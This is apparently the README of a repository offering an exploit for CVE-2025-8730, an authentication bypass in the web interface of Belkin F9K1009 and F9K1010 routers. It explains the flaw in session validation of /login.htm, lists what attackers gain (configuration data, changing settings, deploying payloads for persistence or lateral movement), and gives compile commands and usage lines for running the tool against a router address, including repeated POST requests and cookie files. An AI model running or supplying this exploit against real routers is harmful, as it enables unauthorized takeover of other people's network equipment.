
Exploit demonstrating an authentication bypass vulnerability in the web interface of Belkin F9K1009 and F9K1010 routers.
Author : Byte Reaper
This repository contains a exploit for CVE‑2025‑8730, a critical Authentication Bypass vulnerability affecting the web interface of Belkin F9K1009 and F9K1010 routers.
The flaw lies in the session validation logic of the /login.htm file, where improperly handled cookies or crafted requests allow attackers to bypass login checks and gain full access to the administrative interface without valid credentials.
This vulnerability enables remote attackers (with network access) to:
Access sensitive configuration data
Modify router settings
Deploy further payloads for persistence or lateral movement
NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-8730
gcc exploit.c argparse.c -o CVE-2025-8730 -lcurl
./CVE-2025-8730 -i 192.168.1.1
Verbose Mode :
./CVE-2025-8730 -i 192.168.1.1 -v -c [cookie file]
Full URl :
./CVE-2025-8730 -f http://<IP>/<LOGIN_FILE>
Sleep (second):
./CVE-2025-8730 -i 192.168.1.1 -s 1
Number Request (For loop), example 10 Request POST :
./CVE-2025-8730 -i 192.168.1.1 -k 10 -s 1 -v
License :
MIT License